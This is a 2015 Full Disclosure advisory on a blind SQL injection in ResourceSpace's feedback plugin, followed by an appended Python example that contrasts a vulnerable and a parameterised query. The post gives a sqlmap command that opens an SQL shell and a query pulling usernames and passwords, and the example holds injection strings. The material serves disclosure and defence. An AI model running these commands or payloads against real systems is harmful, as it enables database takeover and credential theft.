Date: Sat, 22 Aug 2015 11:53:56 -0700
From: William Reyor <opticfiber@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Blind boolean SQL injection vulnerability in ResourceSpace CMS

Title: Blind boolean SQL injection vulnerability in ResourceSpace CMS

Author: William F. Reyor III

Contact: opticfiber@...il.com

Published: August 22 2015

Vendor: Montala Limited

Vendor url: www.resourcespace.org

Software: ResourceSpace Digital Asset Management Software

Versions: 7.3.7009 and prior

Status: Unpatched

Vulnerable scripts:

/plugins/feedback/pages/feedback.php


Description:

There is a blind boolean SQL injection vulnerability in the user cookie
processed by the /plugins/feedback/pages/feedback.php script.


This can be validated with sqlmap using the following flags, which give a
full SQL shell:

./sqlmap.py -u "http://<hostname>/plugins/feedback/pages/feedback.php" \
    --cookie="user=test" --level=2 --technique=B --sql-shell

This also allows an attacker to execute arbitrary queries such as
'select username, password, usergroup from user'.



-- 
William Reyor

*"What is essential is invisible to the eye"*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
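
The bug class reported above, as an added example that is not part of the original post and is not ResourceSpace code: a cookie value concatenated into a query gives true/false answers that differ, while a bound parameter does not. It uses sqlite3 in place of the real database; the session column, the token format, the function names and the sample row are assumptions.

```python
import re
import sqlite3

# Assumed token shape for the cookie value (hypothetical, not from the advisory).
TOKEN_RE = re.compile(r"[0-9a-f]{8,64}")

def make_db():
    """Constructed sample data; the `session` column is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (username TEXT, password TEXT, "
               "usergroup INTEGER, session TEXT)")
    db.execute("INSERT INTO user VALUES ('alice', 'hash-placeholder', 3, 'a1b2c3d4')")
    return db

def lookup_vulnerable(db, cookie):
    # The cookie text becomes part of the SQL statement, so a quote in it
    # changes the WHERE clause instead of being compared as data.
    sql = "SELECT username FROM user WHERE session = '" + cookie + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def lookup_hardened(db, cookie):
    # Reject values that do not look like a token, then bind the value as a
    # parameter so the driver never parses it as SQL.
    if not TOKEN_RE.fullmatch(cookie):
        return None
    row = db.execute("SELECT username FROM user WHERE session = ?",
                     (cookie,)).fetchone()
    return row[0] if row else None

def answers_differ(lookup, db):
    """Regression check: do an always-true and an always-false condition
    appended to the cookie produce different results? If so, the lookup
    exposes a boolean oracle."""
    when_true = lookup(db, "test' OR '1'='1")
    when_false = lookup(db, "test' OR '1'='2")
    return when_true != when_false

if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup is an oracle:", answers_differ(lookup_vulnerable, db))
    print("hardened lookup is an oracle:  ", answers_differ(lookup_hardened, db))
```

The answers_differ check can be kept as a unit test around any code path that reads a cookie into a query.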
